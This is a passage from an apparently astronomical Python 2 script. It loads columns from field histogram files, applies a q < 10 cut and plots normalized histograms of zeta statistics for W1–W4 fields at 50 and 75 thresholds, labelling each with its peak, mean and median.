(str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_50 = q_W3_50read[q_W3_50read < 10]\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\nq_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_75 = q_W1_75read[q_W1_75read < 10]\nq_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_75 = q_W2_75read[q_W2_75read < 10]\nq_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_75 = q_W3_75read[q_W3_75read < 10]\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(4,5,12)\nrangemax=7\nn_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, 
bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(4,5,12)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\nax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))\nax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))\nax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))\nax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_\\frac{M}{r}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 10\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W1_50 %.3f W1_75 %.3f \\n W2_50 %.3f W2_75 %.3f \\n W3_50 %.3f W3_75 %.3f \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=21\nq_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_50 = q_W1_50read[q_W1_50read < 10]\nq_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_50 = q_W2_50read[q_W2_50read < 10]\nq_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_50 = q_W3_50read[q_W3_50read < 10]\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\nq_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_75 = q_W1_75read[q_W1_75read < 10]\nq_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % 
(str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_75 = q_W2_75read[q_W2_75read < 10]\nq_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_75 = q_W3_75read[q_W3_75read < 10]\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(4,5,13)\nrangemax=6\nn_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(4,5,13)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\nax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))\nax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % 
(bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))\nax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))\nax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_\\frac{M^2}{r}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 11\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W1_50 %.3f W1_75 %.3f \\n W2_50 %.3f W2_75 %.3f \\n W3_50 %.3f W3_75 %.3f \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=23\nq_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_50 = q_W1_50read[q_W1_50read < 10]\nq_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_50 = q_W2_50read[q_W2_50read < 10]\nq_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_50 = q_W3_50read[q_W3_50read < 10]\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\nq_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_75 = q_W1_75read[q_W1_75read < 10]\nq_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_75 = q_W2_75read[q_W2_75read < 10]\nq_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_75 = q_W3_75read[q_W3_75read < 10]\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(4,5,14)\nrangemax=6\nn_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', 
label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(4,5,14)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\nax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))\nax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))\nax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))\nax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"75: 
%.3f,%.3f,%.3f\" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_\\frac{M^3}{r}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 12\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W1_50 %.3f W1_75 %.3f \\n W2_50 %.3f W2_75 %.3f \\n W3_50 %.3f W3_75 %.3f \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=25\nq_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_50 = q_W1_50read[q_W1_50read < 10]\nq_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_50 = q_W2_50read[q_W2_50read < 10]\nq_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_50 = q_W3_50read[q_W3_50read < 10]\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\nq_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_75 = q_W1_75read[q_W1_75read < 10]\nq_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_75 = q_W2_75read[q_W2_75read < 10]\nq_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_75 = q_W3_75read[q_W3_75read < 10]\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nx = linspace(0,3,500)\n\ngauss_q_W1_50 = gaussian_kde(q_W1_50)\ngauss_q_W2_50 = gaussian_kde(q_W2_50)\ngauss_q_W3_50 = gaussian_kde(q_W3_50)\ngauss_q_W4_50 = gaussian_kde(q_W4_50)\ngauss_q_W1_75 = gaussian_kde(q_W1_75)\ngauss_q_W2_75 = gaussian_kde(q_W2_75)\ngauss_q_W3_75 = gaussian_kde(q_W3_75)\ngauss_q_W4_75 = gaussian_kde(q_W4_75)\n\nplt.subplot(4,5,16)\nrangemax=8\nn_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', 
linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n#plt.plot(x,gauss_q_W1_50(x),'b', linewidth=0.5)\nax=plt.subplot(4,5,16)\n#s = \"50: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W1_50(x))],np.average(q_W1_50),np.median(q_W1_50))\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50)) # only the peak depends on the binning\nax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\n#s = \"50: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W2_50(x))],np.average(q_W2_50),np.median(q_W2_50))\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))\nax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)\n#s = \"50: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W3_50(x))],np.average(q_W3_50),np.median(q_W3_50))\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\n#s = \"50: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W4_50(x))],np.average(q_W4_50),np.median(q_W4_50))\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W1_75(x))],np.average(q_W1_75),np.median(q_W1_75))\ns = \"75: %.3f,%.3f,%.3f\" % 
